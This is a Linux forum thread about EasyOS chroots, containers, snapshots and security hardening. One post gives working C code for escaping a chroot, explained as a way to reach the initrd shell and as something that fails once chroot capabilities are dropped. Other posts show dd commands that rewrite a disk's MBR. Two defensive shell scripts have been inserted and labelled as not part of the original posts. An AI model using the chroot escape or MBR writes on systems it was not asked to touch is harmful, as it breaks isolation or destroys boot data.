All times are UTC - 4
EasyOS 1.0.8, February 20, 2019
Moderators: Flash, JohnMurga
don570


Joined: 10 Mar 2010
Posts: 5262
Location: Ontario

PostPosted: Thu 07 Feb 2019, 15:11    Post subject:  

Note to BarryK...

I found it hard to track down the Easy linux explanation...

For instance I googled...

ibiblio + how easy works

and got this bad link

http://barryk.org/easy/how-easy-works.htm

The correct link would be

https://easyos.org/tech/how-easy-works.html

rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Thu 07 Feb 2019, 20:48    Post subject:  

EasyOS sfs's are not the same as puppy sfs's. You need multiple files such as this
specs file and the main sfs file (174MB).

For a frugal install, download and store them in the sfs folder, something like /mnt/sda1/easy/1.0/sfs/easyos/oe/pyro ... alongside other sfs's (easypak's).

Then Menu, System, Bootmanager configure bootup ... and use the first/topmost button to list the sfs's available and check/tick the box for, in this case, the stretch sfs choice. You then need to reboot for that to be loaded.

The above sfs is a chroot for Ubuntu x86_64. I've included a overview of how that was created in the root folder of that chroot. Once loaded open a terminal and cd / and then chroot ubun .. and press the tab button to auto complete the rest (rather than having to type the long folder name). Press Enter ... and you'll be chroot into that Ubuntu environment (terminal).

That has apt-get, so you can for instance apt-get audacity ... or any other ubuntu program/package, and it will be installed into that chroot. I've already done that for audacity in the above sfs. To run that audacity, make sure the easy container is already running (i.e. that runs on DISPLAY=:1) and inside the chroot simply run

DISPLAY=:1 audacity

and then switch to the easy container desktop (window) and you should see audacity. Sound plays fine in that for me.

Same for any other ubuntu programs/packages. Just apt-get them inside the Ubuntu chroot and run them on your easy desktop. You could for instance (it's generally best to run apt-get update first)
apt-get update
apt-get install galculator
and once that's installed then
DISPLAY=:1 galculator
... or whatever.

Synaptic would be a good one to install (apt-get install synaptic), as then you could run the synaptic gui
DISPLAY=:1 synaptic
... and use that to find/select/install programs.

Be mindful that whilst the programs such as audacity are running on the easy desktop (container), they're not actually contained, it's actually being run from the real root desktop, but within a chroot (so there's a degree of security, but not the full blown easy container security).

Opens up a wider choice of available programs that can be run within EasyOS :)

PS : Reminder that any files you want to work on inside the Ubuntu chroot such as /root/myaudio.mp3 are accessed from the main Easy OS (real root) desktop as /ubuntu-86x64-chroot-with-audacity_1.0/root/myaudio.mp3 i.e. the chroot main top folder name has to be used, but within the chroot (terminal window) it's just /root/myaudio.mp3.
Attachment: audacity.png (159.66 KB)

_________________
( ͡° ͜ʖ ͡°) :wq
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Thu 07 Feb 2019, 23:03    Post subject:  

In that ubuntu chroot I installed dosbox and then unzipped an old win31 program I still use periodically (support ended, but it's a great program for stock timing). Un(surprisingly) ... it worked. EasyOS running Ubuntu running dos, running Win31 :)
_________________
( ͡° ͜ʖ ͡°) :wq
BarryK
Puppy Master


Joined: 09 May 2005
Posts: 8830
Location: Perth, Western Australia

PostPosted: Fri 08 Feb 2019, 07:15    Post subject:  

Exploration of minibase is continuing. Have pretty much got ethernet networking sorted out:

http://bkhome.org/news/201902/basic-ethernet-setup-with-minibase.html

_________________
http://bkhome.org/news/
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Fri 08 Feb 2019, 08:21    Post subject:  

Sharing the same DISPLAY=:1 for the Easy container and running Ubuntu chroot did have too small a font size for my liking, so in the Ubuntu chroot I installed cwm (openbsd-cwm) and set up ctrl-alt-F2 to run another X
X :2 -dpi 144 vt2 & (run in Easy main system terminal)
and then ran cwm on that (command run from inside the Ubuntu chroot)
DISPLAY=:2 export DISPLAY
openbsd-cwm &
audacity &
... and the font size within that is more to my liking (full screen audacity running under cwm)

I have run the easy container on a different desktop (ctrl-alt-F3) using a similar approach, so I could for instance have ctrl-alt-F1 for root/cli (tmux), ctrl-F2 for Ubuntu, ctrl-alt-F3 for the easy container and ctrl-alt-F4 for the Easy main system. With each having their own advantages/disadvantages (tmux for its interconnections (ssh into other boxes), Ubuntu for its repositories/ease of installing things, easy container for browser/security/isolation ... and the main EasyOS system for admin).

_________________
( ͡° ͜ʖ ͡°) :wq
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Sat 09 Feb 2019, 15:16    Post subject:  

BarryK wrote:
Exploration of minibase is continuing. Have pretty much got ethernet networking sorted out:

http://bkhome.org/news/201902/basic-ethernet-setup-with-minibase.html

unwind ... looks interesting http://www.undeadly.org/cgi?action=article;sid=20190128061321

_________________
( ͡° ͜ʖ ͡°) :wq
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Sat 09 Feb 2019, 22:02    Post subject:  

In my remastered version ... that now includes audacity and vlc http://murga-linux.com/puppy/viewtopic.php?p=1017693#1017693, interesting to see the different sizes of the EasyOS sfs

high xz compressed easy sfs : 435MB
normal (gzip) compressed : 543MB
lzo level 1 compressed : 659MB (what I'm running as it's very snappy and a frugal HDD install so space isn't an issue)
Uncompressed : 1636MB

Rounds core EasyOS off nicely for me. I like audacity for its noise filtering and amplification/attenuation functions (adjust mp3's to similar sound levels). VLC is nice for its ease of recording parts of a video you're watching. Makes the Multimedia menu just that more complete IMO.



_________________
( ͡° ͜ʖ ͡°) :wq
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Sun 10 Feb 2019, 17:38    Post subject:  

Barry, I've added a please wait... to ec rollback (and a $0 & prior to exit so it loops back around to the dialog again). When a container's save grows to 100MB+ sfs size it can take 5 seconds or so to complete a rollback. As-is with just exiting (no information shown), you can open the container before the rollback has completed, with unpredictable results (and I'd guess potentially corrupt the save area).

i.e. click container rollback button ... the window just closes. Immediately click ec container desktop icon to launch the container, and the rollback copies might still be perhaps just half way through having actually copied the sfs being rolled back (restored) into the save space (folders).

As I frugal (HDD) boot EasyOS, for me the size of container snapshots (sfs) isn't an issue and using rsync to backup/restore container snapshots is very fast (compared to mksquashfs to create a snapshot and mounting that sfs to copy out its contents in order to restore it).

My other option, of just simply moving or copying the .session folder from the cli, when using mc has its own progress indicator as attached (actual fbgrab snapshot of the console).
Attachment: c.png (10.23 KB)


_________________
( ͡° ͜ʖ ͡°) :wq

Last edited by rufwoof on Wed 13 Feb 2019, 16:27; edited 1 time in total
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Mon 11 Feb 2019, 15:42    Post subject:  

What's quite nice, and very quick, is instead of creating and restoring snapshots of the Easy container, is to just have versions of the container - copies of the .session folder tree.

If instead of creating an sfs copy of the container's save area you just rename (mv) the .session folder (mv .session .session.v1), then the next run has no .session folder (as it was moved to another folder name) so it creates a new clean/fresh .session folder. Restoring a version is again just a mv (removing the current .session beforehand), but a seemingly (for the user) faster way is to just mv the current .session, mv in the .session version being restored and then background remove the one that is no longer needed. Being on the same partition, those moves are near instantaneous (just an inode pointer update). Creating and reactivating versions seems to the user to be near instantaneous. Activate version type action.

For cases of where the Easy container were large, perhaps 1GB of changes/additions having been made, then the Activate (mv) action is far far quicker than creating or restoring snapshots using squashfs. Different versions with relevant data applicable to different clients for instance (and/or different sets of programs installed).

Attached image is a first time/novice user of the "dia" menu option.
Attachment: Diagram1.png (44.14 KB)


_________________
( ͡° ͜ʖ ͡°) :wq
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Tue 12 Feb 2019, 10:52    Post subject:  

See also this (and other) posts in http://murga-linux.com/puppy/viewtopic.php?p=1018236#1018236

When the system boots a small cli linux environment is loaded, predominately busybox based, that then prepares the main system and switch roots into that. That act of switch rooting in effect vapourises that initial boot version. If however you modify the initial boot's init to use chroot instead of switch root (I also commented out the umounting of sys and proc near the end of init), then you can hack out of that chroot i.e. main system/desktop, back into that small initial init boot area. Back in that you can for instance modify the main session's save area (.session content), perhaps even fully replace it ... and then chroot back into it again and 'see' those changes.

The last handful of lines or so of my init (inside initrd) now looks like
Code:
mount -t devtmpfs devtmpfs /easy_new/dev #need to do this before switch_root.
sync
#umount /sys
#umount /proc
exec chroot /easy_new /sbin/init

###END###


The exit-chroot.c hack that I used to exit the chroot looks like (load devx.sfs and compiled with gcc exit-chroot.c -o exit-chroot;chmod +x exit-chroot)
Code:
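#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>

int main(void) {
    int dir_fd, x;
    setuid(0);
    mkdir(".42", 0755);
    dir_fd = open(".", O_RDONLY);            /* keep a handle on the current directory */
    chroot(".42");                           /* requires CAP_SYS_CHROOT; cwd stays outside the new root */
    fchdir(dir_fd);
    close(dir_fd);
    for(x = 0; x < 1000; x++) chdir("..");   /* walk up to the outer root */
    chroot(".");
    return execl("/bin/busybox", "sh", (char *)NULL);
}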

(I've attached a precompiled (under EasyOS 1.0) version of that - an actual .gz file so gzip -d exit-chroot.gz after downloading)

Such an approach could for instance eliminate having to reboot after rolling back a main session to a different snapshot, instead it could exit-chroot, apply the changes and then chroot back in again.

Before running exit-chroot I Menu, Shutdown, Exit to command line ... and then run the exit-chroot program as above. Interestingly if you run it in the main desktop gui within a terminal window, then that window contains the small initial init cli, but the main desktop/gui system also remains functional.
Attachment: exit-chroot.gz (3.95 KB)

_________________
( ͡° ͜ʖ ͡°) :wq
wdt

Joined: 27 Dec 2011
Posts: 38

PostPosted: Tue 12 Feb 2019, 16:17    Post subject:  

I decided to give easy a try, seems to work OK, even network manager, BUT
it is a bit lacking and specifically this
I reflashed the firmware on a ryzen mb, and powered off and reloaded defaults
It had lost the ESP and nothing I could do would get it back
All it could boot was win(32bit) and easy, BUT easy does NOT have efibootmgr
(and win is useless, even if it was an efi version, which it was not)
Eventually I made a refind usb stick and used efi shell and bcfg
Maybe if unplugged every drive except for the one with the ESP the firmware might have found it???
Anyway, if efibootmgr is too big, put efi shell and add a stanza to refind.conf
Sometimes, even if rarely, you need to deal with that, if nothing more than adjusting boot order
I could not find it with pup-get (efibootmgr)
I use refind as bootmgr, when it merges the easy ESP the icon is 3 paint cans,
you can pretty it by copying whatever icon to the easy ESP/EFI/BOOT/
and renaming it to BOOTX64.PNG (it has to be the "right" kind of icon of course)
ie cd /boot/efi/EFI/BOOT/icons; cp os_easy.png ../BOOTX64.PNG
greengeek


Joined: 20 Jul 2010
Posts: 5411
Location: Republic of Novo Zelande

PostPosted: Wed 13 Feb 2019, 01:36    Post subject:  

Is the following link of any concern with regard to Easy's use of containers?

https://nakedsecurity.sophos.com/2019/02/12/linux-container-bug-could-eat-your-server-from-the-inside-patch-now
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Wed 13 Feb 2019, 13:29    Post subject:  

greengeek wrote:
Is the following link of any concern with regard to Easy's use of containers?

https://nakedsecurity.sophos.com/2019/02/12/linux-container-bug-could-eat-your-server-from-the-inside-patch-now

Short answer, no.

That link highlights a flaw in runc that involves obtaining root cli inside, and using that to break out of the container. EasyOS easy container runs as root inside the container, but where capabilities are dropped (to the extent root inside the container is comparable to a restricted user) so even if a remote hacker achieves root cli they cannot break out of the container (chroot capabilities are dropped - and chrooting out of a container is the typical method to break out of the container. I posted such an exit-chroot a few posts earlier that enables breaking out of EasyOS main session back into the initrd cli (when the main session is started using chroot instead of switch root), but that code fails inside the easy container (lack of chroot capabilities)).

_________________
( ͡° ͜ʖ ͡°) :wq
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Sat 16 Feb 2019, 16:53    Post subject: Making a partition inaccessible to real root gui desktop  

In follow up
A neat trick if you launch the main session using chroot rather than switch_root is that you can mount a partition from within the initial init before chrooting (init, within initrd)

.
.
mkdir -p /mnt/sda3
mount /dev/sda3 /mnt/sda3
exec chroot easy_new

... so that sda3 partition is already mounted ... to a mount point that is inaccessible to the main X/gui desktop real root session. So you boot to the normal/full root desktop, can see sda3 listed as a drive icon in the bottom left, but you can't mount or access the content of that, even though you are (full/real) root.

If you then exit X (to command line), and run exit-chroot (so you're back into the initial/small root cli) and then restart the main session again, but disabling chroot

capsh --drop=cap_sys_chroot --chroot=/easy_new --

then you can restart the X desktop again, but you can't even chroot back out of that. That does however also mean you can't launch any containers - as they depend upon chroot.

Whilst you can't access sda3 (in this example) via the main/real root desktop, you can ctrl-alt-Fn into another terminal session, login as root and exit-chroot from that, which then opens up /mnt/sda3 content (and you could copy files to/from that into the main desktop session i.e. cp /mnt/sda3/somefile.txt /easy_new/root/somefile.txt
(having something like mc within the initial init would be useful for such copying of files around **A)).

Even if the X desktop is hacked, then they can't access the initial/small cli - so can't get access to sda3, as the kernel has dropped chroot permissions (capsh). Only local access can gain access to sda3.

EDIT: **A ... Copied the mc bin into initrd's /bin, did a ldd on mc and copied the indicated libs over to the initrd's /lib, copied /usr/share/mc to the same in the initrd's (also copied /usr/share/mc and /mnt/wkg/home/mcedit ... and several other mc config files (filepos, history, ini, panels.ini, Tree)) ... and providing you TERM=linux export TERM before running mc within the initrd it all seems to work. initrd is now 11MB. A series of snaps ... in a pdf file (fake .gz, rename it without that). Actual tty snaps were taken using fbgrab. I've had to compress down the pdf so it could be uploaded so quality of the images is just modest.
Attachment: LQ-system-layout_reduce.pdf.gz (187.39 KB)

_________________
( ͡° ͜ʖ ͡°) :wq
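
A way to check the capability drop discussed in the two posts above (the container's dropped chroot capability, and capsh --drop=cap_sys_chroot for the main session), as an added example that is not part of the original posts. The function names are hypothetical and the two status files are constructed samples in /proc/<pid>/status format; pass a real /proc/<pid>/status path to inspect a live process.

```shell
#!/bin/sh
# Added example, not from the original posts. Function names are hypothetical.
CAP_SYS_CHROOT=18   # bit number of CAP_SYS_CHROOT in <linux/capability.h>

# status_cap_mask FIELD FILE: hex mask of CapEff/CapPrm/CapBnd taken from a
# file in /proc/<pid>/status format.
status_cap_mask() {
    awk -v f="$1:" '$1 == f { print $2 }' "$2"
}

# mask_has_cap HEXMASK BIT: succeeds if BIT is set in HEXMASK.
mask_has_cap() {
    [ -n "$1" ] && [ $(( (0x$1 >> $2) & 1 )) -eq 1 ]
}

# chroot_cap_report [FILE]: present/dropped state of CAP_SYS_CHROOT per set.
chroot_cap_report() {
    cr_file=${1:-/proc/self/status}
    cr_out=
    for cr_field in CapEff CapPrm CapBnd; do
        cr_mask=$(status_cap_mask "$cr_field" "$cr_file")
        if mask_has_cap "$cr_mask" "$CAP_SYS_CHROOT"; then
            cr_state=present
        else
            cr_state=dropped
        fi
        cr_out="$cr_out${cr_out:+ }$cr_field=$cr_state"
    done
    echo "$cr_out"
}

# chroot_blocked [FILE]: succeeds only if the bit is absent from all three
# sets. chroot(2) needs it in CapEff, and once it is gone from CapBnd it
# cannot be regained through exec.
chroot_blocked() {
    case $(chroot_cap_report "$@") in
        *present*) return 1 ;;
        *) return 0 ;;
    esac
}

# write_samples DIR: constructed status excerpts (not captured from EasyOS).
write_samples() {
    printf 'Name:\tsh\nCapPrm:\t0000003fffffffff\nCapEff:\t0000003fffffffff\nCapBnd:\t0000003fffffffff\n' \
        > "$1/full_root.status"
    printf 'Name:\tsh\nCapPrm:\t0000003ffffbffff\nCapEff:\t0000003ffffbffff\nCapBnd:\t0000003ffffbffff\n' \
        > "$1/dropped.status"
}

demo() {
    demo_dir=$(mktemp -d) || return 2
    write_samples "$demo_dir"
    echo "full root:    $(chroot_cap_report "$demo_dir/full_root.status")"
    echo "after --drop: $(chroot_cap_report "$demo_dir/dropped.status")"
    rm -rf "$demo_dir"
}

demo
```
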
rufwoof

Joined: 24 Feb 2014
Posts: 2823

PostPosted: Mon 18 Feb 2019, 15:40    Post subject:  

Further Security Hardening (my remastered version of) EasyOS
=======================================================

Personally I like to consider security from the angle that our home network is just as insecure as using our local libraries or any other network. Accordingly to use that untrusted network a pristine clean OS and system pre-configured to as-desired is the best approach. Accordingly I don't like to save potentially dubious sessions across reboots. For my EasyOS HDD frugal installed setup I've modified EasyOS so that my sda3 (data) partition is mounted within initrd (init), as that way once mounted the chroot (that I use instead of switch-root) cannot access that mount point, nor mount sda3 as it's already mounted. ctrl-alt-F1 (console cli) can however exit-chroot into the initrd's cli (I have mc installed in that to aid in moving files between sda3 and the main or easy containers areas). To 'get to' that sda3 a remote hacker has to break out of the Easy container and get to the main (real) root, and then break out of that real root into the initrd level cli (as not even real root in the main session can access sda3). A high enough series of hurdles for comfort.

I have my EasyOS set up so that it boots to initrd's init cli, and running startx from that loads up a init level mc (cli file manager) on ctrl-alt-F1, the main real root X desktop on ctrl-alt-f4 (when started the easy container X desktop loads to ctrl-alt-f3). So basically after booting I have initrd cli running mc on ctrl-alt-F1 (CA1), the main real root X on CA4 and the Easy container on CA3, with the intent that the bios boot code and grldr loader have been verified as clean, along with rolling back to known clean versions of the main system and easy container after each boot. As part of further hardening ...

BIOS
====

The MBR is basically a 512 byte segment on the very first sector of your hard drive and it is composed of 3 parts: the boot code (446 bytes long), the partition table (64 bytes long) and the boot code signature (2 bytes long).

To backup the boot code itself and nothing else:
Code:
# dd if=/dev/sda of=/tmp/mbr.img_backup bs=446 count=1

and restore with
Code:
# dd if=/tmp/mbr.img_backup of=/dev/sda bs=446 count=1

Also check the partition table and boot code signature i.e. as above, but using 512 instead of 446

sda1's grldr (file) should be checked (loader),

We can record diffs or checksums for the purpose of ensuring integrity

OS
==

Booting the same known clean OS and Easy Container
Code:
/mnt/sda1/easy/easyremastered/.session/.rollback.flg
format
,YYYYMMDDHHMM

i.e.
Code:
,201902181247

Restores for example ...
Code:
/mnt/sda1/easy/easyremastered/releases/easy-1.0/rw-201902181247.sfs

Which can be checksum or diff validated from records kept on sda3

Once (re)booted to a clean main system, can use the desktop easy containers manager to restore the Easy container, but to also ensure that hasn't been changed we checksum, diff or copy in our own known clean version ...

Container restored from for example
Code:
/mnt/sda1/easy/easyremastered/containers/easy/rw-201902180100.sfs

again using checksum or diff checked versions

_________________
( ͡° ͜ʖ ͡°) :wq
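
The checksum records described in the post above, for the 446-byte boot code, the full 512-byte MBR, grldr and the rollback .sfs files, as an added example that is not part of the original post. The function names and manifest format are hypothetical, and the demo runs on a constructed 512-byte image standing in for /dev/sda; on a real system run it as root with the actual device and file paths.

```shell
#!/bin/sh
# Added example, not from the original post: record and verify checksums for
# the MBR regions and for loader/snapshot files. Names are hypothetical.

# region_sum DISK N: SHA-256 of the first N bytes of a device or image.
region_sum() {
    dd if="$1" bs="$2" count=1 2>/dev/null | sha256sum | cut -d' ' -f1
}

# record_baseline DISK MANIFEST FILE...
# Writes "hash label" lines. Keep MANIFEST where the running desktop cannot
# write to it (the post keeps its records on sda3).
record_baseline() {
    rb_disk=$1; rb_manifest=$2; shift 2
    {
        printf '%s bootcode446\n' "$(region_sum "$rb_disk" 446)"
        printf '%s mbr512\n' "$(region_sum "$rb_disk" 512)"
        for rb_f in "$@"; do
            printf '%s file:%s\n' "$(sha256sum < "$rb_f" | cut -d' ' -f1)" "$rb_f"
        done
    } > "$rb_manifest"
}

# verify_baseline DISK MANIFEST
# Prints "CHANGED <label>" per mismatch and returns 1 if anything differs.
verify_baseline() {
    vb_disk=$1; vb_bad=0
    while read -r vb_want vb_label; do
        case $vb_label in
            bootcode446) vb_got=$(region_sum "$vb_disk" 446) ;;
            mbr512)      vb_got=$(region_sum "$vb_disk" 512) ;;
            file:*)
                vb_path=${vb_label#file:}
                if [ -r "$vb_path" ]; then
                    vb_got=$(sha256sum < "$vb_path" | cut -d' ' -f1)
                else
                    vb_got=MISSING
                fi ;;
            *) vb_got=UNKNOWN ;;
        esac
        [ "$vb_got" = "$vb_want" ] || { echo "CHANGED $vb_label"; vb_bad=1; }
    done < "$2"
    return "$vb_bad"
}

# Demo on a constructed image: one byte at offset 450 (inside the partition
# table) is altered, so the 512-byte check trips while the 446-byte one passes.
demo() {
    tmp=$(mktemp -d) || return 2
    dd if=/dev/zero of="$tmp/disk.img" bs=512 count=1 2>/dev/null
    echo 'constructed loader contents' > "$tmp/grldr"
    record_baseline "$tmp/disk.img" "$tmp/manifest" "$tmp/grldr"
    printf 'X' | dd of="$tmp/disk.img" bs=1 seek=450 conv=notrunc 2>/dev/null
    rc=0
    verify_baseline "$tmp/disk.img" "$tmp/manifest" || rc=$?
    rm -rf "$tmp"
    return "$rc"
}

demo || echo "demo: change detected outside the 446-byte boot code"
```
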